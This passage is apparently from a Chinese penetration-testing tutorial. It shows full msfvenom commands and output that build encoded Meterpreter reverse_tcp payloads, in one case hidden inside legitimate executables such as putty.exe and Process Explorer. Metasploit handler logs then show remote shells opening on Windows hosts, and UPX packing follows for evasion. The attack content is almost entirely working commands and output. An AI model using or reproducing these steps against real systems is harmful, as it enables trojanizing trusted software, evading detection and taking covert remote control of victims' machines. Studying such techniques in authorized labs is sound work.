x86/shikata_ga_nai succeeded with size 624 (iteration=9)
x86/shikata_ga_nai chosen with final size 624
Payload size: 624 bytes
Final size of exe file: 2661376 bytes
Saved as: payload1.exe


payload1.exe上传到windows

image.png


# msfconsole
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.0.150
lhost => 192.168.0.150
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.0.150:4444
[*] Sending stage (175686 bytes) to 192.168.0.106
[*] Meterpreter session 1 opened (192.168.0.150:4444 -> 192.168.0.106:30805) at 2022-06-28 17:03:05 +0800
meterpreter > pwd
C:\Users\xiang\Desktop


隐秘地启动一个攻击负载

msfvenom -a x86 --platform Windows -x ProcessExplorer/procexp.exe -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -x putty.exe -k -b '\x00\x0a\xff' -i 10 -f exe -o payload2.exe
Found 1 compatible encoders
Attempting to encode payload with 10 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 381 (iteration=0)
x86/shikata_ga_nai succeeded with size 408 (iteration=1)
x86/shikata_ga_nai succeeded with size 435 (iteration=2)
x86/shikata_ga_nai succeeded with size 462 (iteration=3)
x86/shikata_ga_nai succeeded with size 489 (iteration=4)
x86/shikata_ga_nai succeeded with size 516 (iteration=5)
x86/shikata_ga_nai succeeded with size 543 (iteration=6)
x86/shikata_ga_nai succeeded with size 570 (iteration=7)
x86/shikata_ga_nai succeeded with size 597 (iteration=8)
x86/shikata_ga_nai succeeded with size 624 (iteration=9)
x86/shikata_ga_nai chosen with final size 624
Payload size: 624 bytes
Final size of exe file: 702464 bytes
Saved as: payload2.exe


payload2.exe上传到windows

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.0.150
lhost => 192.168.0.150
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.0.150:4444
[*] Sending stage (175686 bytes) to 192.168.0.158
[*] Meterpreter session 1 opened (192.168.0.150:4444 -> 192.168.0.158:50055) at 2022-06-28 17:23:50 +0800
meterpreter >

加壳

upx

#upx
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2020
UPX 3.96        Markus Oberhumer, Laszlo Molnar & John Reiser   Jan 23rd 2020
Usage: upx [-123456789dlthVL] [-qvfk] [-o file] file..
Commands:
  -1     compress faster                   -9    compress better
  -d     decompress                      -l    list compressed file
  -t     test compressed file                -V    display version number
  -h     give more help                   -L    display software license
Options:
  -q     be quiet                         -v    be verbose
  -oFILE write output to 'FILE'
  -f     force compression of suspicious files
  -k     keep backup files
file..   executables to (de)compress
Type 'upx --help' for more detailed help.
UPX comes with ABSOLUTELY NO WARRANTY; for details visit https://upx.github.io
目录
相关文章
|
29天前
|
机器学习/深度学习 人工智能 监控
提升软件质量的关键路径:高效测试策略与实践在软件开发的宇宙中,每一行代码都如同星辰般璀璨,而将这些星辰编织成星系的过程,则依赖于严谨而高效的测试策略。本文将引领读者探索软件测试的奥秘,揭示如何通过精心设计的测试方案,不仅提升软件的性能与稳定性,还能加速产品上市的步伐,最终实现质量与效率的双重飞跃。
在软件工程的浩瀚星海中,测试不仅是发现缺陷的放大镜,更是保障软件质量的坚固防线。本文旨在探讨一种高效且创新的软件测试策略框架,它融合了传统方法的精髓与现代技术的突破,旨在为软件开发团队提供一套系统化、可执行性强的测试指引。我们将从测试规划的起点出发,沿着测试设计、执行、反馈再到持续优化的轨迹,逐步展开论述。每一步都强调实用性与前瞻性相结合,确保测试活动能够紧跟软件开发的步伐,及时适应变化,有效应对各种挑战。
|
14天前
|
敏捷开发 监控 jenkins
自动化测试之美:打造高效的软件质量保障体系
【10月更文挑战第20天】在软件开发的海洋中,自动化测试如同一艘精准的导航船,引领项目避开错误的礁石,驶向质量的彼岸。本文将扬帆起航,探索如何构建和实施一个高效的自动化测试体系,确保软件产品的稳定性和可靠性。我们将从测试策略的制定、工具的选择、脚本的编写,到持续集成的实施,一步步描绘出自动化测试的蓝图,让读者能够掌握这一技术的关键要素,并在自己的项目中加以应用。
25 5
|
1月前
|
测试技术
软件质量保护与测试(第2版)学习总结第十三章 集成测试
本文是《软件质量保护与测试》(第2版)第十三章的学习总结,介绍了集成测试的概念、主要任务、测试层次与原则,以及集成测试的不同策略,包括非渐增式集成和渐增式集成(自顶向下和自底向上),并通过图示详细解释了集成测试的过程。
52 1
软件质量保护与测试(第2版)学习总结第十三章 集成测试
|
1月前
|
测试技术
软件质量保护与测试(第2版)学习总结第十章 黑盒测试
本文是《软件质量保护与测试》(第2版)第十章的学习总结,介绍了黑盒测试的基本概念和方法,包括等价类划分、边界值分析和因果图法,并通过具体例子展示了如何设计测试用例来验证软件的功能性需求。
64 1
软件质量保护与测试(第2版)学习总结第十章 黑盒测试
|
1月前
|
人工智能 人机交互 数据库
软件质量保护与测试(第2版)学习总结第一章
本文是《软件质量保护与测试》(第2版)第一章的学习总结,概述了软件的特征、分类、软件工程的层次化技术、现代软件开发的变化,以及软件质量的概念和评价体系,包括黑盒、白盒和灰盒测试方法。
31 1
软件质量保护与测试(第2版)学习总结第一章
|
14天前
|
Java 测试技术 持续交付
探索自动化测试的奥秘:提升软件质量的关键
【10月更文挑战第20天】 在当今快速发展的软件行业中,自动化测试已成为确保产品质量和加速开发周期的重要工具。本文将深入探讨自动化测试的核心概念、实施策略及其对软件开发生命周期的影响,旨在为读者提供一种全面理解自动化测试的视角,并展示如何有效地将其应用于实际项目中以提高软件质量和效率。
16 2
|
1月前
|
安全 Linux Shell
Kali渗透测试:使用Metasploit对Web应用的攻击
Kali渗透测试:使用Metasploit对Web应用的攻击
|
1月前
|
测试技术
软件质量保护与测试(第2版)学习总结第十一章 白盒测试
本文是《软件质量保护与测试》(第2版)第十一章的学习总结,详细讲解了白盒测试中的控制流测试技术,包括语句覆盖、判断覆盖、条件覆盖、判定-条件覆盖和路径覆盖等方法,并通过具体代码示例展示了如何设计测试用例来验证程序中的不同执行路径。
51 2
|
1月前
|
安全 程序员 网络安全
Kali渗透测试:对软件的溢出漏洞进行测试
Kali渗透测试:对软件的溢出漏洞进行测试
|
1月前
|
安全 数据挖掘 测试技术
提升软件质量:探索高效测试策略
在软件开发过程中,测试是一个关键步骤,它决定了产品能否满足用户需求并保持高性能和安全性。本文将探讨几种有效的测试策略,包括自动化测试、性能测试和安全测试,以帮助开发团队提高软件质量。我们将分析每种方法的优势、实施步骤及面临的挑战,并提供实用的建议。
22 1